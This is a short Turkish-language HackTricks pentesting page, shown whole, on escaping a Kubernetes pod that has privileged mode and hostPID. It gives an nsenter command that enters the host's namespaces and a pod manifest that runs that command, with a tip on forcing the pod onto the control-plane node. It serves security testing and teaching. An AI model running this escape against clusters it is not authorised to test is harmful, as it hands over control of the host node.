Pod Escape Privileges

AWS hacklemeyi sıfırdan kahraman olmaya öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Ayrıcalıklı ve hostPID

Bu yetkilerle, ana bilgisayarın işlemlerine erişebilirsiniz ve ana bilgisayarın işlemlerinden birinin ad alanına girmek için yeterli yetkilere sahip olursunuz. Unutmayın, ayrıcalıklı olmak yerine bazı yeteneklere ve diğer potansiyel savunma mekanizmalarının atlatılmasına (örneğin apparmor ve/veya seccomp) ihtiyacınız olabilir.

Aşağıdaki gibi bir şeyi yürütmek, pod'dan kaçmanıza izin verecektir:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Yapılandırma örneği:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları:

Last updated